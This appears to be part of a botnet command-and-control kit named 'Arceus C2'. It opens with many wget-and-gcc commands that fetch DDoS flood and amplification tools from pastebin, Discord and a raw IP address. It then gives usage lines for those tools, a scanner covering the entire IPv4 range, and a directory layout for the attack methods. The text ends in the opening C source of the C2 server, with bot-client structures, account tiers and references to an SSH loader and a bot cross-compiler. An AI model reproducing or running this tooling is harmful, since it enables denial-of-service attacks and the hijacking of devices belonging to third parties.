- wget -q https://cdn.discordapp.com/attachments/545653871427715093/574418889484664852/RAWstd -O nfobypass; chmod 777 nfobypass
- wget -q https://cdn.discordapp.com/attachments/564177458631409694/575879023440166932/CF_bypass.php -O CF_Bypass
- wget -q https://cdn.discordapp.com/attachments/570046106474643486/575885559688462336/xts3 -O bo4bypass; chmod 777 bo4bypass
- ==================================================
- Extra Methods I:
- wget -q http://pastebin.com/raw/9v26VXgV -O vse.c; gcc -o vse vse.c -pthread
- wget -q http://pastebin.com/raw/y6hAsCMv -O telnet.c; gcc -o telnet telnet.c -pthread
- wget -q http://pastebin.com/raw/dR2pEeiq -O dominate.c; gcc -o dominate dominate.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/Other/tcp_abuse -O tcp_abuse
- wget -q http://98.143.148.177/Archive/reprobate/layer4/Other/udp_abuse -O udp_abuse
- ==================================================
- Extra Methods II:
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/zsyn.c -O zsyn.c; gcc -o zsyn zsyn.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/xsyn.c -O xsyn.c; gcc -o xsyn xsyn.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/csyn.c -O csyn.c; gcc -o csyn csyn.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/essyn.c -O essyn.c; chmod 777 essyn.c
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/syn_collection/issyn.c -O issyn.c; chmod 777 issyn.c
- ==================================================
- ╔════════════════════════════════════════════════════════════╗
- ║ Arceus I - Compilation logs - Attack Scripts - Scanners v2 ║
- ╚════════════════════════════════════════════════════════════╝
- # DNS: - 0 Error Logs - 0 Warning Logs || Compile Success! || DNSSCAN: - 1 Error Logs - 0 Warning Logs || Compile Failed!
- # SNMP: - 0 Error Logs - 0 Warning Logs || Compile Success! || SNMPSCAN: - 0 Error Logs - 3 Warning Logs || Compile Success!
- # DB2: - 0 Error Logs - 0 Warning Logs || Compile Success! || DB2SCAN: - 0 Error Logs - 3 Warning Logs || Compile Success!
- # ECHO: - 0 Error Logs - 0 Warning Logs || Compile Success! || ECHOSCAN: - 0 Error Logs - 3 Warning Logs || Compile Success!
- # MDNS: - 0 Error Logs - 0 Warning Logs || Compile Success! || MDNSSCAN: - 0 Error Logs - 3 Warning Logs || Compile Success!
- # MEMCACHE: - File is precompiled. set permissions < Finished
- # RIP: - 0 Error Logs - 0 Warning Logs || Compile Success! || RIPSCAN: - 0 Error Logs - 3 Warning Logs || Compile Success!
- # REAPER: - 0 Error Logs - 0 Warning Logs || Compile Success! || REAPERSCAN: - 0 Error Logs - 3 Warning Logs || Compile Success!
- # ARCEUS: - 0 Error Logs - 0 Warning Logs || Compile Success! || ARCEUSSCAN: - 0 Error Logs - 3 Warning Logs || Compile Success!
- # HEARTBEAT: - 0 Error Logs - 0 Warning Logs || Compile Success! || HEARTBEATSCAN: - 0 Error Logs -
- # GRENADE: - File is Precompiled. Set Permissions < Finished
- # ZAP: - 0 Error Logs - 0 Warning Logs || Compile Success!
- # WIZARD: - 0 Error Logs - 0 Warning Logs || Compile Success!
- # BOGUS: - 0 Error Logs - 0 Warning Logs || Compile Success!
- # RAWUDP: - 0 Error Logs - 0 Warning Logs || Compile Success!
- # TCP-PSH: - File can NOT be compiled. just use raw .c file. still works < set permissions and your good to go
- # TCP-RST: - File can NOT be compiled. just use raw .c file. still works < set permissions and your good to go
- # TCP-XMAS: - file can NOT be compiled. just use raw .c file. still works < set permissions and your good to go
- # TCP-FIN: - file can NOT be compiled. just use raw .c file. still works < set permissions and your good to go
- # TCP-ACK: - file can NOT be compiled. just use raw .c file. still works < set permissions and your good to go
- # UDP_VSE1: - 0 Error Logs - 0 Warning Logs || Compile Success!
- # UDP_VSE2: - 0 Error Logs - 0 Warning Logs || Compile Success!
- # EJUNK: - File is precompiled. set permissions and your good to go
- # XANAX: - File is precompiled. set permissions and your good to go
- # FRAG: - 0 Error Logs - 0 Warning Logs || Compile Success!
- # ARME: - 0 Error Logs - 0 Warning Logs || Compile Success!
- ╔═════════════════════════════════════════════════════════╗
- ║ Arceus I - Script Usages - Attack Scripts - Scanners v2 ║
- ╚═════════════════════════════════════════════════════════╝
- ###############
- # Ok, so trim_integer suggest using -1 for all IPHM based methods < pps should = -1
- # Also, when scanning, make sure to set the $delay to 1ms
- # $IPSTART is the beginning IPRange Ex: 0.0.0.0
- # $IPEND is the finish_integer IPRange Ex: 255.255.255.255 || This will scan everything!
- ###############
- # DNS: ./dns $IP $PORT $FILE $THREADS $TIME || DNSSCAN: ./dnsscan (broken)
- # SNMP: ./snmp $IP $PORT $FILE $THREADS $PPS $TIME || SNMPSCAN: ./snmpscan $IPSTART $IPEND $FILE $THREADS $MS
- # DB2: ./db2 $IP $PORT $FILE $THREADS $PPS $TIME || DB2SCAN: ./db2scan $IPSTART $IPEND $FILE $THREADS $MS
- # ECHO: ./echo $IP $PORT $LIST $THREADS $PPS $TIME || ECHOSCAN: ./echoscan $IPSTART $IPEND $FILE $THREADS $MS
- # MDNS: ./mdns $IP $PORT $LIST $THREADS $PPS $TIME || MDNSSCAN: ./mdnsscan $IPSTART $IPEND $FILE $THREADS $MS
- # MEMCACHE: ./memcache $IP $PORT $FILE $THREADS $PPS $TIME || MEMCACHESCAN: ./memcachescan $IPSTART $IPEND $FILE $THREADS $MS
- # RIP: ./rip $IP $PORT $FILE $THREADS $PPS $TIME || RIPSCAN: ./ripscan $IPSTART $IPEND $FILE $THREADS $MS
- # REAPER: ./reaper $IP $PORT $FILE $THREADS $PPS $TIME || REAPERSCAN: ./reaperscan $IPSTART $IPEND $FILE $THREADS $MS
- # HEARTBEAT: ./heartbeat $IP $PORT $FILE $THREADS $PPS $TIME || HEATBEATSCAN: ./heartbeatscan $IPSTART $IPEND $FILE $THREADS $MS
- # ARCEUS: ./arceus $IP $PORT $FILE $THREADS $PPS $TIME || ARCEUSSCAN: ./arceusscan $IPSTART $IPEND $FILE $THREADS $MS
- # Grenade: ./grenade $IP $THREADS $PPS $TIME $SOURCEIP
- # ZAP: ./zap $IP $PORT $THREADS $PPS $TIME
- # WIZARD: ./wizard $IP $PORT $THREADS $PPS $TIME
- # BOGUS: ./bogus $IP $PORT $THREADS $PPS $TIME
- # RAWUDP: ./rawudp $IP $PPS $THREADS $TIME
- # TCP-PSH: ./tcp-psh.c $IP $THREADS $PPS $TIME
- # TCP-RST: ./tcp-rst.c $IP $THREADS $PPS $TIME
- # TCP-XMAS: ./tcp-xmas.c $IP $THREADS $PPS $TIME
- # TCP-FIN: ./tcp-fin.c $IP $THREADS $PPS $TIME
- # TCP-ACK: ./tcp-ack.c $IP $THREADS $PPS $TIME
- # UDP-VSE1: ./UDP_VSE $IP $PORT $PPS $TIME
- # UDP_VSE2 ./UDP_VSE2 $IP $PORT $PPS $THREADS $TIME
- # EJUNK: ./ejunk $IP $PORT $THREADS $PPS $TIME
- # XANAX: ./xanax $IP $THREADS $PPS $TIME
- # FRAG: ./frag $IP $PORT $THREADS $PPS $TIME
- # ARME: ./arme $URL $THREADS $LIST $TIME (SAYS MANUAL IP, WTF? IDK)
- ==================================================
- Installs II:
- ==================================================
- Scannable Methods II:
- wget -q http://pastebin.com/raw/JV9nCf6U -O dns.c && gcc -o dns dns.c -pthread
- wget -q http://pastebin.com/raw/ASH2DYqq -O dnsscan.c && gcc -o dnsscan dnsscan.c -pthread
- wget -q http://pastebin.com/raw/7LXZXPWf -O snmp.c && gcc -o snmp snmp.c -pthread
- wget -q http://pastebin.com/raw/EtCTaqG1 -O snmpscan.c && gcc -o snmpscan snmpscan.c -pthread
- wget -q http://pastebin.com/raw/PNDMd2CF -O db2.c && gcc -o db2 db2.c -pthread
- wget -q http://pastebin.com/raw/Fuza6KEM -O db2scan.c && gcc db2scan.c -pthread -lpcap -o db2scan
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/echo/echo.c -O echo.c && gcc -o echo echo.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/echo/echoscan.c -O echoscan.c && gcc echoscan.c -pthread -lpcap -o echoscan
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/mdns/mdns.c -O mdns.c && gcc -o mdns mdns.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/mdns/mdnsscan.c -O mdnsscan.c && gcc -o mdnsscan mdnsscan.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/memcache/memcache -O memcache && chmod 777 memcache
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/memcache/memcachescan -O memcachescan && chmod 777 memcachescan
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/rip/rip.c -O rip.c && gcc -o rip rip.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/rip/ripscan.c -O ripscan.c && gcc -o ripscan ripscan.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/reaper/reaper.c -O reaper.c && gcc -o reaper reaperscan.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/reaper/reaperscan.c -O reaperscan.c && gcc -o reaperscan reaperscan.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/heartbeat/heartbeat.c -O heartbeat.c && gcc -o heartbeat heartbeat.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Sources/heartbeat/heartbeatscan.c -O heartbeatscan.c && gcc -o heartbeatscan heartbeatscan.c -pthread
- ==================================================
- Extra Methods III:
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Precompiled/grenade -O grenade && chmod 777 grenade
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/Other_Collection/zap.c -O zap.c && gcc -o zap zap.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/Other_Collection/wizard.c -O wizard.c && gcc -o wizard wizard.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Sources/bogus.c -O bogus.c && gcc -o bogus bogus.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Raw_Collection/rawudp.c -O rawudp.c && gcc -o rawudp rawudp.c -pthread
- ==================================================
- TCP Collection:
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/tcp_collection/tcp-psh.c -O tcp-psh.c && chmod 777 tcp-psh.c
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/tcp_collection/tcp-rst.c -O tcp-rst.c && chmod 777 tcp-rst.c
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/tcp_collection/tcp-fin.c -O tcp-fin.c && chmod 777 tcp-fin.c
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/tcp_collection/tcp-ack.c -O tcp-ack.c && chmod 777 tcp-ack.c
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/tcp_collection/tcp-xmas.c -O tcp-xmas.c && chmod 777 tcp-xmas.c
- ==================================================
- Extra Methods IV:
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Raw_Collection/UDP_VSE2.c -O UDP_VSE2.c && gcc -o UDP_VSE2 UDP_VSE2.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/UDP/Raw_Collection/UDP_VSE.c -O UDP_VSE.c && gcc -o UDP_VSE UDP_VSE.c -pthread
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Precompiled/ejunk -O ejunk && chmod 777 ejunk
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Precompiled/xanax -O xanax && chmod 777 xanax
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Sources/frag.c -O frag.c && gcc -o frag frag.c -pthread
- ==================================================
- layer 7 methods
- wget -q https://cdn.discordapp.com/attachments/564177458631409694/580871213316964373/bypass.js -O omega.js
- wget -q http://98.143.148.177/Archive/reprobate/layer7/Sources/arme.c -O arme.c && gcc -o arme arme.c -pthread
- #================================================#
- TotalmethodsIPHM = "62"
- #================================================#
- # V1 Methods
- ScannedMethods = ["ldap", "ntp", "tftp", "ssdp", "portmap", "chargen", "sentinel", "netbios", "mssql", "ts3"]
- Extramethods = ["vse", "telnet", "tcp-abuse", "udp-abuse", "dominate"]
- bypassmethods = ["ovhbypass", "cfbypass", "nfobypass", "bo4bypass"]
- vipmethods = ["hun-fun", "ass-crk", "eft-pwr", "pmp-pmp", "zch-cri"]
- extramethods = ["essyn", "csyn", "xsyn", "zsyn", "issyn"]
- servermethods = ["winsyn", "winseqid", "yubina", "prowin"]
- totalv1methods = "33"
- #================================================#
- # v1 Directories
- #================================================#
- # Scanned / reflection Based methods
- #================================================#
- reflection = "amp/methods/layer4/v1/reflection/"
- bandwidth = "amp/methods/layer4/v1/bandwidth/"
- ldap = "amp/methods/layer4/v1/reflection/ldap/"
- ssdp = "amp/methods/layer4/v1/reflection/ssdp/"
- ntp = "amp/methods/layer4/v1/reflection/ntp/"
- tftp = "amp/methods/layer4/v1/reflection/tftp/"
- portmap = "amp/methods/layer4/v1/reflection/portmap/"
- sentinel = "amp/methods/layer4/v1/reflection/sentinel/"
- chargen = "amp/methods/layer4/v1/reflection/chargen/"
- mssql = "amp/methods/layer4/v1/reflection/mssql/"
- ts3 = "amp/methods/layer4/v1/reflection/ts3/"
- netbios = "amp/methods/layer4/v1/reflection/netbios/"
- #================================================#
- # Yubina Collection / bandwidth Based Methods
- #================================================#
- prowin = "amp/methods/layer4/v1/bandwidth/yubinacollection/"
- yubina = "amp/methods/layer4/v1/bandwidth/yubinacollection/"
- winseqid = "amp/methods/layer4/v1/bandwidth/yubinacollection/"
- winsyn = "amp/methods/layer4/v1/bandwidth/yubinacollection/"
- #================================================#
- # Yubina Collection / bandwidth Based Methods
- #================================================#
- ovhbypass = "amp/methods/layer4/v1/bandwidth/bypasses/"
- nfobypass = "amp/methods/layer4/v1/bandwidth/bypasses/"
- cfbypass = "amp/methods/layer4/v1/bandwidth/bypasses/"
- bo4bypass = "amp/methods/layer4/v1/bandwidth/bypasses/"
- #================================================#
- # Custom Methods / bandwidth / reflection based methods
- #================================================#
- hunfun = "amp/methods/layer4/v1/custom/hun-fun"
- pmppmp = "amp/methods/layer4/v1/custom/pmp-pmp"
- zchcri = "amp/methods/layer4/v1/custom/zch-cri"
- asscrk = "amp/methods/layer4/v1/custom/ass-crk"
- eftpwr = "amp/methods/layer4/v1/custom/eft-pwr"
- #================================================#
- # Other methods / bandwidth Based methods
- #================================================#
- vse = "amp/methods/layer4/v1/bandwidth/other/"
- telnet = "amp/methods/layer4/v1/bandwidth/other/"
- dominate = "amp/methods/layer4/v1/bandwidth/other/"
- udpabuse = "amp/methods/layer4/v1/bandwidth/other/"
- tcpabuse = "amp/methods/layer4/v1/bandwidth/other/"
- csyn = "amp/methods/layer4/v1/bandwidth/other/"
- xsyn = "amp/methods/layer4/v1/bandwidth/other/"
- zsyn = "amp/methods/layer4/v1/bandwidth/other/"
- essyn = "amp/methods/layer4/v1/bandwidth/other/"
- issyn = "amp/methods/layer4/v1/bandwidth/other/"
- #================================================#
- # v2 methods
- #================================================#
- ScannedMethodsII = ["dns", "mdns", "db2", "arceus", "echo", "snmp", "memcache", "rip", "reaper", "heartbeat"]
- TCPCollection = ["tcp-psh", "tcp-rst", "tcp-fin", "tcp-xmas", "tcp-ack"]
- ExtraMethodsIII = ["grenade", "zap", "rawudp", "bogus", "wizard"]
- VIPMethodsII = ["msqdnm", "tfdnp", "lndp", "ardmsp"]
- ExtraMethodsIV = ["udp_vse1", "udp_vse2", "ejunk", "xanax", "frag"]
- totalv2methods = "29"
- #================================================#
- # v2 Directories
- #================================================#
- #================================================#
- # Scanned / reflection Based methods
- #================================================#
- dns = "amp/methods/layer4/v2/reflection/dns/"
- snmp = "amp/methods/layer4/v2/reflection/snmp/"
- db2 = "amp/methods/layer4/v2/reflection/db2/"
- echo = "amp/methods/layer4/v2/reflection/echo/"
- mdns = "amp/methods/layer4/v2/reflection/mdns/"
- memcache = "amp/methods/layer4/v2/reflection/memcache/"
- rip = "amp/methods/layer4/v2/reflection/rip/"
- reaper = "amp/methods/layer4/v2/reflection/reaper/"
- heartbeat = "amp/methods/layer4/v2/reflection/heartbeat/"
- arcmethod = "amp/methods/layer4/v2/reflection/arceus/"
- #================================================#
- # Other methods / bandwidth based methods
- #================================================#
- zap = "amp/methods/layer4/v2/bandwidth/other/"
- wizard = "amp/methods/layer4/v2/bandwidth/other/"
- bogus = "amp/methods/layer4/v2/bandwidth/other/"
- rawudp = "amp/methods/layer4/v2/bandwidth/other/"
- udpvse1 = "amp/methods/layer4/v2/bandwidth/other/"
- udpvse2 = "amp/methods/layer4/v2/bandwidth/other/"
- grenade = "amp/methods/layer4/v2/bandwidth/other/"
- xanax = "amp/methods/layer4/v2/bandwidth/other/"
- frag = "amp/methods/layer4/v2/bandwidth/other/"
- ejunk = "amp/methods/layer4/v2/bandwidth/other/"
- #================================================#
- # Layer 7 methods
- #================================================#
- omega = "amp/methods/layer7/v2/"
- arme = "amp/methods/layer7/v2/"
- #================================================#
- # tcp-collection methods / bandwidth based methods
- #================================================#
- tcppsh = "amp/methods/layer4/v2/bandwidth/tcpcollection/"
- tcpfin = "amp/methods/layer4/v2/bandwidth/tcpcollection/"
- tcpxmas = "amp/methods/layer4/v2/bandwidth/tcpcollection/"
- tcprst = "amp/methods/layer4/v2/bandwidth/tcpcollection/"
- tcpack = "amp/methods/layer4/v2/bandwidth/tcpcollection/"
- #================================================#
- # V1 Directory Listings
- #================================================#
- # Methods that go into amp/methods/layer4/v1/bandwidth/yubinacollection/ directory
- # prowin, yubina, winseqid, winsyn
- #================================================#
- # Methods that go into amp/methods/layer4/v1/bandwidth/bypasses/ Directory
- # ovhbypass, nfobypass, bo4bypass
- #================================================#
- # Methods that go into amp/methods/layer7/v1/
- # cfbypass
- #================================================#
- # Methods that go into amp/methods/layer4/v1/bandwidth/extra/ folder
- # vse, telnet, dominate, udp_abuse, tcp-abuse
- #================================================#
- # Methods that go into /custom/ directories
- # amp/methods/layer4/v1/custom/hun-fun || amp/methods/layer4/custom/pmp-pmp
- # amp/methods/layer4/v1/custom/zch-cri || amp/methods/layer4/custom/ass-crk || amp/methods/layer4/custom/eft-pwr
- #================================================#
- # v2 Directory Listing
- #================================================#
- # methods that go into amp/methods/layer4/v2/reflection/
- # dns, snmp, db2, echo, mdns, memcache, rip, reaper, heartbeat, arc-method
- #================================================#
- # Methods that go inside amp/methods/layer4/v2/bandwidth/other
- # zap, wizard, bogus, rawudp, udp_vse1, udp_vse2, grenade, xanax, frag
- #================================================#
- # Methods that go into amp/methods/layer4/bandwidth/tcpcollection/ directory
- # tcp-psh.c tcp-fin.c tcp-ack.c tcp-rst.c tcp-xmas.c
- #================================================#
- # Methods that go into amp/methods/layer7/v2/
- # omega, arme
- */
- //╔══════════════════════════════════════════════════════╗
- // Base Includes
- #include <stdio.h> // Header Files [Interpreted Modules]
- #include <stdlib.h> // Header Files [Interpreted Modules]
- #include <string.h> // Header Files [Interpreted Modules]
- #include <sys/types.h> // Header Files [Interpreted Modules]
- #include <sys/socket.h> // Header Files [Interpreted Modules]
- #include <netdb.h> // Header Files [Interpreted Modules]
- #include <unistd.h> // Header Files [Interpreted Modules]
- #include <time.h> // Header Files [Interpreted Modules]
- #include <fcntl.h> // Header Files [Interpreted Modules]
- #include <sys/epoll.h> // Header Files [Interpreted Modules]
- #include <errno.h> // Header Files [Interpreted Modules]
- #include <pthread.h> // Header Files [Interpreted Modules]
- #include <signal.h> // Header Files [Interpreted Modules]
- #include <ctype.h> // Header Files [Interpreted Modules]
- #include <arpa/inet.h> // Header Files [Interpreted Modules]
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- // Tool Includes
- #include "resolver.h" // Header Files [Additional Interpreted Module]
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- #define max_file_descriptor_value 1000000 // Maximum File Descriptor Value Statement [1000000]
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- // Color Codes #Custom
- #define Arceus_I_Custom_Purple = "\e[91m" // ANSI Colours
- #define Arceus_I_Custom_Orange = "\e[91m" // ANSI Colours
- #define Arceus_I_Custom_Pink = "\e[91m" // ANSI Colours
- #define Arcues_I_Custom_Green = "\e[38;5;82m" // ANSI Colours
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- // Project Information
- #define Arceus_I_Project "Arceus C2 Source" // Defining File Principals
- #define Arceus_I_Developer_List ["FlexingOnLamers", "GeorgiaCri", "Transmissional", "Zach"] // Defining File Principals
- #define Arceus_I_Substrate_Version "Arceus I - Substrate Data System v4"
- #define Arceus_I_Version_Number = "Arceus I Beta Version 10"
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- #define Arceus_I_User_Tool_I = "adduser" // Defining Tool Principals
- #define Arceus_I_User_Tool_II = "domainresolver" // Defining Tool Principals
- #define Arceus_I_User_Tool_III = "portscanner" // Defining Tool Principals
- #define Arceus_I_User_Tool_VI = "IPGeoLocation" // Defining Tool Principals
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- // File paths
- #define Arceus_I_User_File "arceus.txt" // Defining File Paths
- #define Arceus_I_IPHM_Reflection_Scanners "amp/scanners/" // Defining File Paths
- #define Arceus_I_IPHM_Reflection_Attack_Methods "amp/methods/Reflection/" // Defining File Paths
- #define Arceus_I_IPHM_Bandwidth_Attack_Methods "amp/methods/Bandwidth/" // Defining File Paths
- #define Arceus_I_IPHM_Reflection_Lists "amp/lists" // Defining File Paths
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- // External /Scripts/ || /tools/
- #define Arceus_I_IPHM_Attack_Process_Killer = "c2/scripts/IPHM_Attack_Process_Killer.py" // Defining External Tool Paths
- #define Arceus_I_IPHM_Scanner_Process_Killer = "c2/scripts/IPHM_Scanner_Process_Killer.py" // Defining External Tool Paths
- #define Arceus_I_Process_Killer_Installation = "c2/scripts/wget.py" // Defining External Tool Paths
- #define Arceus_I_IPHM_Installation_Script = "c2/IPHM_Installation.py" // Defining External Tool Paths
- #define Arceus_I_IPLookup_API = "var/www/html/iplookup.php" // Defining External Tool Paths
- #define Arceus_I_IPBlock_SSH_Scanner = "c2/scripts/scan.py" // Defining External Tool Paths
- #define Arceus_I_SSH_Loader = "c2/scripts/sshloader.py" // Defining External Tool Paths
- #define Arceus_I_Bot_Cross_Compiler = "bot/Arceus.py" // Defining External Tool Paths
- //╚══════════════════════════════════════════════════════╝
- //╔══════════════════════════════════════════════════════╗
- // Access Types (Accounts):
- #define Arceus_I_Account_Normal = "normal" // Defining Arceus Account Identification Types
- #define Arceus_I_Account_Admin = "Admin" // Defining Arceus Account Identification Types
- #define Arceus_I_Account_VIP = "vip" // Defining Arceus Account Identification Types
- #define Arceus_I_Account_Owner = "owner" // Defining Arceus Account Identification Types
- //╚══════════════════════════════════════════════════════╝
- struct account // Create Account Struct.
- {
- char username[200]; // username
- char password[200]; // password
- char identification_type [200]; // Admin / normal [Admin/vip/normal]
- };
- static struct account accounts[500];
- struct arceus_substrate_device_data_v4 { // Create Client Data [Telnet] Struct.
- uint32_t internet_protocol;
- char x86; // Char Every Line For Output Communication
- char mips; // Char Every Line For Output Communication
- char arm; // Char Every Line For Output Communication
- char spc; // Char Every Line For Output Communication
- char ppc; // Char Every Line For Output Communication
- char sh4; // Char Every Line For Output Communication
- char transmitted_successfully; // Char Every Line For Output Communication
- } clients[max_file_descriptor_value]; // Set 'CLient' File Descriptor Value As Stated
- struct arceus_substrate_telnet_data_v4 { // Create Telnet Data Struct.
- uint32_t internet_protocol; // Unsigned_Int 32 [Internet Protocol Output]
- int transmitted_successfully; // Use Integer To Display 'Connnected' Value
- } managements[max_file_descriptor_value]; // Set 'CLient' File Descriptor Value As Stated
- static volatile FILE *file_filedescription_value; // Static Volatile [Setting Each Integer For EPOLL and Listen FD]
- static volatile int bindinginterpreter = 0; // Static Volatile [Setting Each Integer For EPOLL and Listen FD]
- static volatile int listeninginterpretation = 0; // Static Volatile [Setting Each Integer For EPOLL and Listen FD]
- static volatile int successful_transmission = 0; // Static Volatile [Setting Each Integer For EPOLL and Listen FD]
- int buffer_size_string_compare(unsigned char *buffer, int bufferSize, int fd) // Create Integers For Buffer Size 'Unsigned_Char'
- {
- int total_output = 0, got = 1; // 0 = Deny / 1 = Accept Output
- while (got == 1 && total_output < bufferSize && *(buffer + total_output - 1) != '\n') { got = read(fd, buffer + total_output, 1); total_output++; } // If Accepted [got == 1] - Display Output, Break line '\n'
- return got; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- void trim_removev2(char *target_string) // Void To Char String, Do Not Output To Original Function Caller
- {
- int trim_integer; // Output Statement Result Integers
- int start_integer = 0; // Output Statement Result Integers
- int finish_integer = strlen(target_string) - 1; // Output Statement Result Integers
- while (isspace(target_string[start_integer])) start_integer++; // Use 'While Loop' To Begin Function Call [Any Subzero Value] - [Calculus Is Irrelevant] - Check If Passed Character Is In 'White-Space'
- while ((finish_integer >= start_integer) && isspace(target_string[finish_integer])) finish_integer--; // Use 'While Loop' To Begin Function Call [Any Subzero Value] - [Calculus Is Irrelevant] - Check If Passed Character Is In 'White-Space'
- for (trim_integer = start_integer; trim_integer <= finish_integer; trim_integer++) target_string[trim_integer - start_integer] = target_string[trim_integer]; // 'I' Value - (trim_integer = start_integer; trim_integer <= finish_integer; trim_integer++)
- target_string[trim_integer - start_integer] = '\0'; // Start String Of 'I' Value
- }
- static int socket_interpretation_block_v1(int save_file_content) // Create Static Integer [Static Integer, Will Allow Concurrent Bind Socket]
- {
- int flag_network_integer, s; // Set Flag Integer
- flag_network_integer = fcntl(save_file_content, F_GETFL, 0); // Set Flag Error Handle Output
- if (flag_network_integer == -1) // Set Flag Value [-1]
- {
- perror("arceus_non_block_socket : failed"); // Error Handling Output
- return -1; // Error Value == -1
- }
- flag_network_integer |= O_NONBLOCK; // Set_Flag==NONBLOCK
- s = fcntl(save_file_content, F_SETFL, flag_network_integer);
- if (s == -1) // Error Value == -1
- {
- perror("arceus_non_block_socket : failed"); // Error Handling Output
- return -1; // Error Value == -1
- }
- return 0; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- /* struct addrinfo {
- int ai_flags; | flag type set state | state -> in usage -- sockstream
- int ai_family; | family type set state | state -> in usage -- sockstream
- int ai_socktype; | socket type statement | state -> in usage -- sockstream
- int ai_protocol; | protocol | state -> in usage -- sockstream
- socklen_t ai_addrlen; | address length | state -> in usage -- sockstream
- struct sockaddr *ai_addr; | address | state -> in usage -- sockstream
- char *ai_canonname; | n/a | state -> not in usage
- struct addrinfo *ai_next; | next | state -> not in usage
- */
- static int socket_intepretation_modified(char *port) // Socket Bind Interpretation V [ Edited By Zach, Modified Header Address For Adjacent Binding and Listening]
- {
- struct addrinfo hints; // Create Struct. For AddressInformation, Create 's' As Integer
- struct addrinfo *output_result_integer, *rp; // Create Struct. For AddressInformation, Create 's' As Integer
- int s, save_file_content; // Create Struct. For AddressInformation, Create 's' As Integer
- memset(&hints, 0, sizeof(struct addrinfo)); // Fill Data Block Using 'memset'
- hints.ai_family = AF_UNSPEC; // Socket Properties - [SOCKSTREAM, AI, UNSPEC]
- hints.ai_socktype = SOCK_STREAM; // Socket Properties - [SOCKSTREAM, AI, UNSPEC]
- hints.ai_flags = AI_PASSIVE; // Socket Properties - [SOCKSTREAM, AI, UNSPEC]
- s = getaddrinfo(NULL, port, &hints, &output_result_integer); // Defining 's' Value
- if (s != 0) // Call Function If 's' == 0
- {
- fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s)); // Error Handling, 'Getting Address Information'
- return -1; // Error Value == -1
- }
- for (rp = output_result_integer; rp != NULL; rp = rp->ai_next)
- {
- save_file_content = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol); // Socket Bind Interpretation [ Modified To Be Created As One] -- [MORE STABLE]
- if (save_file_content == -1) continue; // Call Function If save_file_content == -1
- int yes = 1; // Yes == 1
- if (setsockopt(save_file_content, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) perror("arceus_setsockopt : failed"); // Improved Sockopt Handling, Using SOL_SOCKET
- s = bind(save_file_content, rp->ai_addr, rp->ai_addrlen); // Bind Everything Stated Above
- if (s == 0) // Call Function If 's' == 0
- {
- break; // Terminate Loop Function, Continue Connection [Broadcast]
- }
- close(save_file_content); // Close Concurrent Function [save_file_content]
- }
- if (rp == NULL) // rp == NULL, No Available Integer [May Modify This and State 'NULL' as 0]
- {
- fprintf(stderr, "arceus_socket_binding : failed - you may be using the same binding port as before.\n"); // Error Handling - Failed Socket Binding, This is Rare, Unless Same Output Port Is Used
- return -1; // Error Value == -1
- }
- freeaddrinfo(output_result_integer); // Check Addresses That Have No Integer State Value '-1'
- return save_file_content;// Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- void arceus_broadcast(char *output_message, int var, char *message_vector) // Broadcast The Following On Administator [Screen]
- {
- int msg_manage_val = 1; // Send Management Value Statement. This Is Usually Set As '1'
- if(strcmp(output_message, "SUCC") == 0) msg_manage_val = 0; // We Are Using 'SUCC/FUCC' V2. [Modified The General Network Threads, Should Stop The Source From Being Slow]
